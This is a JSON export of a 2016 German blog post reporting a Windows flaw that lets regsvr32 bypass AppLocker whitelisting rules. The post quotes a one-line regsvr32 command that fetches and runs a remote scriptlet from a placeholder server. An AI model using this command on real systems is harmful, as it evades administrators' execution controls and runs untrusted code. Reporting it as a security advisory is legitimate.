{"id":176850,"date":"2016-04-25T10:55:23","date_gmt":"2016-04-25T08:55:23","guid":{"rendered":"http:\/\/www.borncity.com\/blog\/?p=176850"},"modified":"2023-07-02T22:39:15","modified_gmt":"2023-07-02T20:39:15","slug":"windows-schwachstelle-hebelt-applocker-aus","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2016\/04\/25\/windows-schwachstelle-hebelt-applocker-aus\/","title":{"rendered":"Windows-Schwachstelle hebelt AppLocker aus"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline; border-width: 0px;\" title=\"win7\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2012\/03\/win7_thumb1.jpg\" alt=\"win7\" width=\"44\" height=\"42\" align=\"left\" border=\"0\" \/>Eine Sicherheitsl\u00fccke in Windows l\u00e4sst sich ausnutzen, um von Administratoren gesetzte AppLocker-Ausf\u00fchrungsregeln f\u00fcr Anwendungen zu umgehen.<\/p>\n<p><!--more--><\/p>\n<p>In Windows 7 und Windows Server 2008 R2 wurde die Funktion <a href=\"https:\/\/technet.microsoft.com\/de-de\/library\/dd759117.aspx\" target=\"_blank\" rel=\"noopener\">AppLocker vorgestellt<\/a>. Unter Windows 7 ist diese nur in der Ultinate- und Enterprise-Variante nutzbar. Mit AppLocker k\u00f6nnen Administratoren <a href=\"https:\/\/technet.microsoft.com\/de-de\/library\/hh831440.aspx\" target=\"_blank\" rel=\"noopener\">Regeln festlegen<\/a>, um Benutzern das Installieren oder Nutzen von Software zu erlauben oder zu verbieten.<\/p>\n<p>Das Ganze ist aber nicht so ganz kollateralsch\u00e4denfrei. Bereits im Artikel <a href=\"https:\/\/borncity.com\/blog\/2016\/02\/29\/was-schtzt-vor-locky-und-anderer-ransomware\/\">Was sch\u00fctzt vor Locky und anderer Ransomware?<\/a> hatte ich auf den Hotfix <a href=\"https:\/\/support.microsoft.com\/en-us\/kb\/2532445\" target=\"_blank\" rel=\"noopener\">KB2532445<\/a> (You can circumvent AppLocker rules by using an Office macro on a computer that is running Windows 7 or Windows Server 2008 R2) verwiesen, der eine L\u00fccke in Office abdecken soll.<\/p>\n<p>Jetzt ist Casey Smith aus Colorade per Zufall auf eine weitere Sicherheitsl\u00fccke in AppLocker gesto\u00dfen, die er in diesem <a href=\"https:\/\/web.archive.org\/web\/20160731023213\/http:\/\/subt0x10.blogspot.de:80\/2016\/04\/bypass-application-whitelisting-script.html\" target=\"_blank\" rel=\"noopener\">Blog-Beitrag<\/a> dokumentiert hat. Mit einem einfachen Befehl:<\/p>\n<p>regsvr32 \/s \/n \/u \/i:http:\/\/server\/file.sct scrobj.dll<\/p>\n<p>gelang es ihm, AppLocker auszuhebeln. Offenbar ist <a href=\"https:\/\/technet.microsoft.com\/de-de\/library\/bb490985.aspx\" target=\"_blank\" rel=\"noopener\"><em>regsvr32 <\/em><\/a>in den AppLocker-Anwendungsregeln in einer WhiteList enthalten.\u00a0Ob eine Blockade des Befehls zu Windows-Funktionseinbu\u00dfen f\u00fchrt, ist unklar. Bisher gibt es wohl keinen Patch, der die L\u00fccke abdichtet. <a href=\"https:\/\/twitter.com\/aionescu\/status\/723271303570972672\" target=\"_blank\" rel=\"noopener\">Hier findet sich ein Tweet<\/a>, wo Device Guard als L\u00f6sung ausgef\u00fchrt wird. Eine ausf\u00fchrlichere Betrachtung des Themas findet sich in <a href=\"https:\/\/web.archive.org\/web\/20171016060054\/https:\/\/www.csoonline.com\/article\/3060242\/security\/researcher-uses-regsvr32-function-to-bypass-applocker.html\" target=\"_blank\" rel=\"noopener\">diesem Artikel<\/a> (englisch). (<a href=\"https:\/\/web.archive.org\/web\/20171201183919\/https:\/\/mspoweruser.com\/researcher-discovers-vulnerability-windows-bypass-applocker\/\" target=\"_blank\" rel=\"noopener\">via<\/a>)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Eine Sicherheitsl\u00fccke in Windows l\u00e4sst sich ausnutzen, um von Administratoren gesetzte AppLocker-Ausf\u00fchrungsregeln f\u00fcr Anwendungen zu umgehen.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[4966,1782,4325],"class_list":["post-176850","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-applocker","tag-sicherheitslucke","tag-windows"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/176850","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=176850"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/176850\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=176850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=176850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=176850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}